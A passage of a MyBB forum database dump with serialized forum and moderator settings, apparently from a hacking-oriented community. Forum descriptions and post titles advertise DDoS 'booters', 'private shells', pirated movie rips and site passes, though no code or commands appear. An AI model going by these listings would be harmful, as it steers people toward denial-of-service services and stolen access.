\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,61\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:31:\"How To Get Passes To Porn Sites\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"qvfmJ.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:66;a:37:{s:3:\"fid\";s:2:\"66\";s:4:\"name\";s:6:\"Gamers\";s:11:\"description\";s:127:\"Gamers Private Forum. We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here!\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,66\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"61\";s:15:\"lastpostsubject\";s:30:\"Some Changes that will be made\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"gamer.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:79;a:37:{s:3:\"fid\";s:2:\"79\";s:4:\"name\";s:6:\"Coders\";s:11:\"description\";s:135:\"The goal of LHC (LH Coders) is to create a unique group of coders who are willing to support and bring amazing content to this forum. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,79\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"67\";s:15:\"lastpostsubject\";s:34:\"Need some coder to check this code\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"1lVmr.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:81;a:37:{s:3:\"fid\";s:2:\"81\";s:4:\"name\";s:7:\"DDoSers\";s:11:\"description\";s:85:\"Find the best booters here. Learn to create booters, DDoSers, post your requests etc.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,81\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:19:\"Some private shells\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:7:\"dos.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:82;a:37:{s:3:\"fid\";s:2:\"82\";s:4:\"name\";s:20:\"The Marketers Palace\";s:11:\"description\";s:51:\"We are a High Quality group all about Money Making.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,82\";s:9:\"disporder\";s:1:\"6\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"2\";s:15:\"lastpostsubject\";s:74:\"Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"uP3eg.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:64;a:37:{s:3:\"fid\";s:2:\"64\";s:4:\"name\";s:28:\"Movie & TV RIPs, Streams etc\";s:11:\"description\";s:123:\"Want to watch a newly released movie online? Want to watch your favorite TV serial online? This is the right place for you.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"65\";s:10:\"parentlist\";s:7:\"6,65,64\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"4\";s:15:\"lastpostsubject\";s:18:\"Sinister Movie Rip\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:22:\"redhat-sound_video.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:71;a:37:{s:3:\"fid\";s:2:\"71\";s:4:\"name\";s:13:\"Gamers Lounge\";s:11:\"description\";s:37:\"A place to chill for all the gamers. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,71\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:28:\"L33thacking Minecraft Server\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"games.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:72;a:37:{s:3:\"fid\";s:2:\"72\";s:4:\"name\";s:8:\"Consoles\";s:11:\"description\";s:90:\"Discussions on famous gaming consoles such as Playstation 3 and Xbox should be held here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,72\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:26:\"DO NOT BUY NFS Most Wanted\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:11:\"console.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:73;a:37:{s:3:\"fid\";s:2:\"73\";s:4:\"name\";s:24:\"Mobile and Tablet Gaming\";s:11:\"description\";s:76:\"For those who have Kindles, IOS, Androids, and Tablet needs post them here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,73\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:28:\"Temple Run or Subway Surfer?\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"ipad.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:74;a:37:{s:3:\"fid\";s:2:\"74\";s:4:\"name\";s:26:\"Online and Computer Gaming\";s:11:\"description\";s:100:\"Discuss your favorite games here. Topics include Counter Strike, Minecraft, Texas Hold\'em Poker etc.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,74\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"262\";s:15:\"lastpostsubject\";s:15:\"GEARS OF WAR :P\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:23:\"orange_folder_games.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:75;a:37:{s:3:\"fid\";s:2:\"75\";s:4:\"name\";s:29:\"Cheats, Walkthrough and Codes\";s:11:\"description\";s:93:\"Need cheats? Share your favorite codes, cheats and walkthroughs on your favorite games here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,75\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:25:\"Batman Arkham City Cheats\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:15:\"games_black.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:76;a:37:{s:3:\"fid\";s:2:\"76\";s:4:\"name\";s:13:\"Playstation 3\";s:11:\"description\";s:82:\"The top rated console for having the best graphic design and other cool features. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"72\";s:10:\"parentlist\";s:8:\"70,72,76\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"257\";s:15:\"lastpostsubject\";s:20:\"rage cheats and tips\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:31:\"playstation_3_standing_icon.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:77;a:37:{s:3:\"fid\";s:2:\"77\";s:4:\"name\";s:8:\"Xbox 360\";s:11:\"description\";s:158:\"The Xbox 360 is the second video game console developed by and produced for Microsoft and the successor to the Xbox also competes with the Sony\'s PS3 and Wii.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"72\";s:10:\"parentlist\";s:8:\"70,72,77\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"306\";s:15:\"lastpostsubject\";s:34:\"GamerTag Availability Checker Site\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"xbox_360.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}}'); INSERT INTO `mybb_datacache` (`title`, `cache`) VALUES ('moderators', 'a:81:{i:0;i:0;i:1;s:0:\"\";i:3;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"4\";s:3:\"fid\";s:1:\"3\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:50;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"4\";s:3:\"fid\";s:1:\"3\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:49;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"4\";s:3:\"fid\";s:1:\"3\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:4;s:0:\"\";i:5;s:0:\"\";i:2;s:0:\"\";i:48;s:0:\"\";i:19;s:0:\"\";i:6;s:0:\"\";i:7;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"1\";s:3:\"fid\";s:1:\"7\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:56;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"1\";s:3:\"fid\";s:1:\"7\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:83;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"1\";s:3:\"fid\";s:1:\"7\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:42;s:0:\"\";i:47;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"6\";s:3:\"fid\";s:2:\"47\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:65;s:0:\"\";i:64;s:0:\"\";i:9;s:0:\"\";i:8;s:0:\"\";i:10;s:0:\"\";i:11;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"2\";s:3:\"fid\";s:2:\"11\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"0\";s:5:\"title\";s:10:\"Moderators\";}}}i:12;s:0:\"\";i:59;s:0:\"\";i:13;s:0:\"\";i:14;s:0:\"\";i:46;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"5\";s:3:\"fid\";s:2:\"46\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"0\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:15;s:0:\"\";i:20;s:0:\"\";i:21;s:0:\"\";i:16;s:0:\"\";i:17;a:1:{s:10:\"usergroups\";a:1:{i:6;a:12:{s:3:\"mid\";s:1:\"3\";s:3:\"fid\";s:2:\"17\";s:2:\"id\";s:1:\"6\";s:7:\"isgroup\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";}}}i:45;s:0:\"\";i:18;s:0:\"\";i:43;s:0:\"\";i:51;s:0:\"\";i:69;s:0:\"\";i:52;s:0:\"\";i:53;s:0:\"\";i:67;s:0:\"\";i:68;s:0:\"\";i:22;s:0:\"\";i:23;s:0:\"\";i:24;s:0:\"\";i:25;s:0:\"\";i:26;s:0:\"\";i:27;s:0:\"\";i:31;s:0:\"\";i:28;s:0:\"\";i:55;s:0:\"\";i:29;s:0:\"\";i:54;s:0:\"\";i:30;s:0:\"\";i:84;s:0:\"\";i:57;s:0:\"\";i:58;s:0:\"\";i:61;a:1:{s:5:\"users\";a:2:{i:82;a:14:{s:3:\"mid\";s:2:\"15\";s:3:\"fid\";s:2:\"61\";s:2:\"id\";s:2:\"82\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\"1\";s:17:\"canusecustomtools\";s:1:\"1\";s:8:\"username\";s:7:\"iTzIpod\";s:9:\"usergroup\";s:1:\"9\";s:12:\"displaygroup\";s:2:\"13\";}i:62;a:14:{s:3:\"mid\";s:2:\"13\";s:3:\"fid\";s:2:\"61\";s:2:\"id\";s:2:\"62\";s:7:\"isgroup\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:10:\"canviewips\";s:1:\"0\";s:19:\"canopenclosethreads\";s:1:\"1\";s:16:\"canmanagethreads\";s:1:\"1\";s:20:\"canmovetononmodforum\";s:1:\